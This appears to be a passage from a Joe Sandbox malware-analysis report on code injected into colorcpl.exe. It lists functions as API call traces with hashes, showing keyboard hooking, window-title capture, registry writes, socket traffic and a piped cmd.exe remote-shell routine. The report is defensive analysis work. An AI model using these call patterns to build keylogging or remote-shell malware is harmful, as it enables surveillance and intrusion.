                                                            • Part of subcall function 02FA4DC1: FreeLibrary.KERNEL32(00000000), ref: 02FA4E79
                                                            • Part of subcall function 02FA4DC1: LoadLibraryA.KERNEL32(?), ref: 02FA4EB1
                                                            • Part of subcall function 02FA4DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02FA4EC3
                                                            • Part of subcall function 02FA4DC1: FreeLibrary.KERNEL32(00000000), ref: 02FA4ECA
                                                            • Part of subcall function 02FA4DC1: GetProcAddress.KERNEL32(00000000,?), ref: 02FA4ED9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                          • String ID: X=t
                                                          • API String ID: 1170566393-2691586945
                                                          • Opcode ID: 2c83fb3846ff813558495ed05f5c1dc0fad96139a9ed8a5f8b7ab3c8420335a4
                                                          • Instruction ID: eeec4e90d9a22ab4b66a20832c589bc2851fdb96a7c6ecd57f0a457159e406ec
                                                          • Opcode Fuzzy Hash: 2c83fb3846ff813558495ed05f5c1dc0fad96139a9ed8a5f8b7ab3c8420335a4
                                                          • Instruction Fuzzy Hash: DCD017726021256FE320A769AC04AAEAA9EDF967A4F110426F910DB641DAD48C9286A0
                                                          Function 02FA35E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02FA3605
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02FA3622
                                                          • RegCloseKey.KERNEL32(?), ref: 02FA362D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 90abb578344ef77efbbf80055bcbdcd1895e56522eea52a402e9d0ab4767ed68
                                                          • Instruction ID: 0be1d473b3bed0dbffc3ade8a64fe9e48d55e2808a74ae0fec82d2d48c716c6c
                                                          • Opcode Fuzzy Hash: 90abb578344ef77efbbf80055bcbdcd1895e56522eea52a402e9d0ab4767ed68
                                                          • Instruction Fuzzy Hash: 0A01A2BAE40128BBDF219AA5DD08DEEBB7DDB44B90F004095BB05E2200DA708A159BB0
                                                          Function 02FA3733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,030052F0), ref: 02FA374F
                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02FA3768
                                                          • RegCloseKey.KERNEL32(00000000), ref: 02FA3773
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 5b5ec85d0cf99f6f042485db10d5081de076b22a4ae6299a1fd1e7a770a81ddc
                                                          • Instruction ID: 9185ee9f7d6ff371b88c03ca5695b848f3e71456ced0b37bd07bc8462cf8c33d
                                                          • Opcode Fuzzy Hash: 5b5ec85d0cf99f6f042485db10d5081de076b22a4ae6299a1fd1e7a770a81ddc
                                                          • Instruction Fuzzy Hash: 8A014BB280412DFBDF219FA1DC44DEA7F79EF057A0F004190BF0966010DB318965DBA0
                                                          Function 02FA3584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02FA35A4
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,030052F0), ref: 02FA35C2
                                                          • RegCloseKey.KERNEL32(?), ref: 02FA35CD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: bd8095ce2ed7427541a4e307ae439e3f8708f63cdef7256b080d7df5544389ca
                                                          • Instruction ID: b8d84f244952d67224d6702cf7577ead4f4e096713c0022537b063826c5e0862
                                                          • Opcode Fuzzy Hash: bd8095ce2ed7427541a4e307ae439e3f8708f63cdef7256b080d7df5544389ca
                                                          • Instruction Fuzzy Hash: 04F01D76E4021CFFDF119EA49C45FEDBBBCEB04B90F104495BB04EA241D6715A249BA0
                                                          Function 02FA353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,02F9C1D7,02FF6C58), ref: 02FA3551
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,02F9C1D7,02FF6C58), ref: 02FA3565
                                                          • RegCloseKey.KERNEL32(?,?,?,02F9C1D7,02FF6C58), ref: 02FA3570
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 542fa06ddea43e7da96649421cdc73fb94de6e6939b72d973952a3ff5a5ab718
                                                          • Instruction ID: d9718fa7a7f6302a25246d129396209657ac3b63a66b5e9e450b12330e9126be
                                                          • Opcode Fuzzy Hash: 542fa06ddea43e7da96649421cdc73fb94de6e6939b72d973952a3ff5a5ab718
                                                          • Instruction Fuzzy Hash: 91E06572D41238FFDF214AB29C0DDEBBF6CDF06AE0B400584BE0895101D2615E10D6F0
                                                          Function 02FA38B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,02FF60B4), ref: 02FA38C0
                                                          • RegSetValueExA.KERNEL32(02FF60B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38DB
                                                          • RegCloseKey.ADVAPI32(02FF60B4,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38E6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID:
                                                          • API String ID: 1818849710-0
                                                          • Opcode ID: 267639aaca4f5c35b93d5462cff34252f91104d5737e7af4ffd1cf9343b039a7
                                                          • Instruction ID: 2adb93daf277679f4e4e4ae507d1370f194dbd05a7fd0e34a6cc89727cf21160
                                                          • Opcode Fuzzy Hash: 267639aaca4f5c35b93d5462cff34252f91104d5737e7af4ffd1cf9343b039a7
                                                          • Instruction Fuzzy Hash: 10E03972A40218FBDF119EA09C06FEABB6CEF04AA0F004595BF04AA140D6718A2497A0
                                                          Function 02FAB847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 02FAB85B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: @
                                                          • API String ID: 1890195054-2766056989
                                                          • Opcode ID: a2e940c40e56a232ce944cf6094498fc3aecd8422e5ec74afff33add19685d88
                                                          • Instruction ID: 98f2dbad9facf63f75d593af84bcf0fdb13069966ea12d08bc593fff9a0079fe
                                                          • Opcode Fuzzy Hash: a2e940c40e56a232ce944cf6094498fc3aecd8422e5ec74afff33add19685d88
                                                          • Instruction Fuzzy Hash: BED017B580231C9FC720EFA9E805A8DBBFCFB08214F00416AED49E3700E774A8048B84
                                                          Function 02FA5B25 Relevance: 3.2, APIs: 2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID:
                                                          • API String ID: 180926312-0
                                                          • Opcode ID: 41e410d0d94ac8cebd4e5c351c11a3043476979a7c7a8891c4931b0c475aeb32
                                                          • Instruction ID: 1bbb59b650b5d641977171d20084c28324e25301565572a414b734de021331ce
                                                          • Opcode Fuzzy Hash: 41e410d0d94ac8cebd4e5c351c11a3043476979a7c7a8891c4931b0c475aeb32
                                                          • Instruction Fuzzy Hash: 9251B5716082455AEB24FB31DCA0AFFB3A6AF91784F50493DE74A471D0EF30590ACE92
                                                          Function 02FDEFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FD8295: GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82CC
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                            • Part of subcall function 02FD8295: _abort.LIBCMT ref: 02FD8313
                                                            • Part of subcall function 02FDF0F7: _abort.LIBCMT ref: 02FDF129
                                                            • Part of subcall function 02FDF0F7: _free.LIBCMT ref: 02FDF15D
                                                            • Part of subcall function 02FDED6C: GetOEMCP.KERNEL32(00000000,?,?,02FDEFF5,?), ref: 02FDED97
                                                          • _free.LIBCMT ref: 02FDF050
                                                          • _free.LIBCMT ref: 02FDF086
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast_abort
                                                          • String ID:
                                                          • API String ID: 2991157371-0
                                                          • Opcode ID: 1f8503c25e72da39a985d22f5b99530d5137fb474669dc478aa7aed59f8f0827
                                                          • Instruction ID: 97c46af536b46fa5da8f2ceac642806a9d00861f954fc53dce228f2a18ee3fdc
                                                          • Opcode Fuzzy Hash: 1f8503c25e72da39a985d22f5b99530d5137fb474669dc478aa7aed59f8f0827
                                                          • Instruction Fuzzy Hash: 4E31F131D00148AFDB10EBA8D848FA9B7F7EF447A5F6C4299E6059B691EB369D40CF40
                                                          Function 02FD6206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD6227
                                                            • Part of subcall function 02FD61B8: RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,02FC2F93,00000000,0000000F,02FBF99D,?,?,02FC1A44,?,?,00000000), ref: 02FD6263
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap$_free
                                                          • String ID:
                                                          • API String ID: 1482568997-0
                                                          • Opcode ID: 0d8cd157feb119dc06fb9fec7784589438ca6f4b767d4e4b6fc2523a35b939ca
                                                          • Instruction ID: c17a73ee85a770c5935488e7d9ea613d3ee899ec8b257e0fe680b1b87b451074
                                                          • Opcode Fuzzy Hash: 0d8cd157feb119dc06fb9fec7784589438ca6f4b767d4e4b6fc2523a35b939ca
                                                          • Instruction Fuzzy Hash: 6FF06232E42115AA9F212A25BC04F6B376F8FD2BF6F1C4159EB54E6184DF30940089A1
                                                          Function 02F9165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                          • Instruction ID: 08be4649bf27974caeaee7376a7e7b78a637e317562a2bfbf7c84c4ce51a8b8e
                                                          • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                          • Instruction Fuzzy Hash: D1F05EB1F092035AEF1C8B34896472A77965B802E5F648B3DF26EC61D0D731C9958E04
                                                          Function 02FABB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 02FABB49
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 02FABB5C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$ForegroundText
                                                          • String ID:
                                                          • API String ID: 29597999-0
                                                          • Opcode ID: cc993fde039ca97e27a9a6b3dcb09d7958dbc31b37188631e10a75e824b9a6c2
                                                          • Instruction ID: 37f0cbb1d69a74cfbaabb539fb87833446cb7e030111e6aa1f0db5444f4967e4
                                                          • Opcode Fuzzy Hash: cc993fde039ca97e27a9a6b3dcb09d7958dbc31b37188631e10a75e824b9a6c2
                                                          • Instruction Fuzzy Hash: 1DE04875E4032C6BFB30A6A49C4DFD5776C9704790F000599B61CD72C5EEA169548BE1
                                                          Function 02F9D0A4 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,02F9EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,02FF60CC,00000003,00000000), ref: 02F9D0B3
                                                          • GetLastError.KERNEL32 ref: 02F9D0BE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID:
                                                          • API String ID: 1925916568-0
                                                          • Opcode ID: d4756bc88a9b320ef1f53d4126dfce6f7c0a3006e1dc46d0b4eeef26c76fd3bb
                                                          • Instruction ID: d0441967617290abbd03847a97d6287031129732c93fdb12d5ec518cc4f3b8ee
                                                          • Opcode Fuzzy Hash: d4756bc88a9b320ef1f53d4126dfce6f7c0a3006e1dc46d0b4eeef26c76fd3bb
                                                          • Instruction Fuzzy Hash: ACD01270A4A204DBEF487B70D85D75979959744741F400829F20BC95C0DBB448A04A21
                                                          Function 02F99E1F Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID:
                                                          • API String ID: 176396367-0
                                                          • Opcode ID: 0dea954fc5b986c6fdaeecd243983f28cef98818bb9f169f92f4c739e89d0d3c
                                                          • Instruction ID: 6a773f08bc336ec372824c3bc6c3323ec8887f013404e46f05d7941f229c611a
                                                          • Opcode Fuzzy Hash: 0dea954fc5b986c6fdaeecd243983f28cef98818bb9f169f92f4c739e89d0d3c
                                                          • Instruction Fuzzy Hash: D61190319052099BEF15FF68EC50AEF7BBAAF54354B10002EEA0693290EF74A915CF90
                                                          Function 02F9A3A2 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CallNextHookEx.USER32(030050F0,?,?,?), ref: 02F9A40D
                                                            • Part of subcall function 02F9B681: GetKeyState.USER32(00000011), ref: 02F9B686
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallHookNextState
                                                          • String ID:
                                                          • API String ID: 3280314413-0
                                                          • Opcode ID: a8dc79b6b131f0260330f0986788b9d2539e13af318e94ea637f729253b67e8f
                                                          • Instruction ID: 3311d1ed9a5ef298ad6ba7d9b42779adae82f63c759cb82fd13dfb1d7e3dc020
                                                          • Opcode Fuzzy Hash: a8dc79b6b131f0260330f0986788b9d2539e13af318e94ea637f729253b67e8f
                                                          • Instruction Fuzzy Hash: 31F0D1726042059BEF15AEBCED4892A775AEB8A3C4F000429EB8246995CA62D8299F11
                                                          Function 02FD61B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 472cc55cfceec155afe86fcca509b2e5152f48bb7a4db9ede76720f4c45574a7
                                                          • Instruction ID: 80cbd346882e9e6da356d040c3370a361fb38189ae0bca1b443b1fc58558ad8e
                                                          • Opcode Fuzzy Hash: 472cc55cfceec155afe86fcca509b2e5152f48bb7a4db9ede76720f4c45574a7
                                                          • Instruction Fuzzy Hash: A1E06D33E4122257FB312A66BC04B9B7B5F9B42BF4F1D0221AF15D6186CF61D901CAE1
                                                          Function 02F9489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 02F948B3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
                                                          • Opcode ID: 77576b226d5d7e688e65b73d498af111b7cb5fb539c5089e9790c2b3602f880a
                                                          • Instruction ID: b295cc1738544ab29805b0169c57b094a9c978f749b2cf5192cc4ec57f55827b
                                                          • Opcode Fuzzy Hash: 77576b226d5d7e688e65b73d498af111b7cb5fb539c5089e9790c2b3602f880a
                                                          • Instruction Fuzzy Hash: EDD0133255950C8FD5117574590F8A4775CC717515F0047565CB5835C7E644171CC2B7
                                                          Function 02FB6D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: 6930901c65e14d36ea46bb8722dbe44ec967b08f0cc130a0c53aa02e2fc3d49b
                                                          • Instruction ID: f1a70bc0129cd5dc47069aa993d9eb306165b87225fdedcc2fed9ff31893d402
                                                          • Opcode Fuzzy Hash: 6930901c65e14d36ea46bb8722dbe44ec967b08f0cc130a0c53aa02e2fc3d49b
                                                          • Instruction Fuzzy Hash: 01B09B75104205FF9F051760C8048AA7D669BC83C0F008D0C758741130C53284509731
                                                          Function 02FB6D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 56ea60db45ac78fdf984b62d20ba01fe3bd51aa4315f902c602c10484aaba625
                                                          • Instruction ID: 7b4c6f11b195ee6a1e91967c9284f7216ef5f2958c824c2f5252520581b28aa2
                                                          • Opcode Fuzzy Hash: 56ea60db45ac78fdf984b62d20ba01fe3bd51aa4315f902c602c10484aaba625
                                                          • Instruction Fuzzy Hash: 8EB0927A208206FF9E061B60C804C6ABEA6AFC83C1B00CC0CBA8640130D67384609B22

                                                          Non-executed Functions

                                                          Function 02F9569A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 02F956E6
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • __Init_thread_footer.LIBCMT ref: 02F95723
                                                          • CreatePipe.KERNEL32(03006CCC,03006CB4,03006BD8,00000000,02FF60CC,00000000), ref: 02F957B6
                                                          • CreatePipe.KERNEL32(03006CB8,03006CD4,03006BD8,00000000), ref: 02F957CC
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,03006BE8,03006CBC), ref: 02F9583F
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 02F95897
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02F958BC
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02F958E9
                                                            • Part of subcall function 02FC4801: __onexit.LIBCMT ref: 02FC4807
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,03004F90,02FF60D0,00000062,02FF60B4), ref: 02F959E4
                                                          • Sleep.KERNEL32(00000064,00000062,02FF60B4), ref: 02F959FE
                                                          • TerminateProcess.KERNEL32(00000000), ref: 02F95A17
                                                          • CloseHandle.KERNEL32 ref: 02F95A23
                                                          • CloseHandle.KERNEL32 ref: 02F95A2B
                                                          • CloseHandle.KERNEL32 ref: 02F95A3D
                                                          • CloseHandle.KERNEL32 ref: 02F95A45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: SystemDrive$cmd.exe
                                                          • API String ID: 2994406822-3633465311
                                                          • Opcode ID: 087d9cb8e6115152b3a14d1a650267897b64e1da1c1108adbdd825671133cf45
                                                          • Instruction ID: 3176e3e4ee7514df04fac543d82682c6fc22dc6fcf9cb60a72e5672b18ab9dc9
                                                          • Opcode Fuzzy Hash: 087d9cb8e6115152b3a14d1a650267897b64e1da1c1108adbdd825671133cf45
                                                          • Instruction Fuzzy Hash: 45919171A0620DAFFF01FB24EC50E3A7A9BEB44788F40042DFB4696295DF6698158B61
                                                          Function 02FA2132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 02FA2141
                                                            • Part of subcall function 02FA38B2: RegCreateKeyA.ADVAPI32(80000001,00000000,02FF60B4), ref: 02FA38C0
                                                            • Part of subcall function 02FA38B2: RegSetValueExA.KERNEL32(02FF60B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38DB
                                                            • Part of subcall function 02FA38B2: RegCloseKey.ADVAPI32(02FF60B4,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38E6
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 02FA2181
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FA2190
                                                          • CreateThread.KERNEL32(00000000,00000000,02FA2829,00000000,00000000,00000000), ref: 02FA21E6
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02FA2455
                                                          Strings
                                                          Memory Dump Source
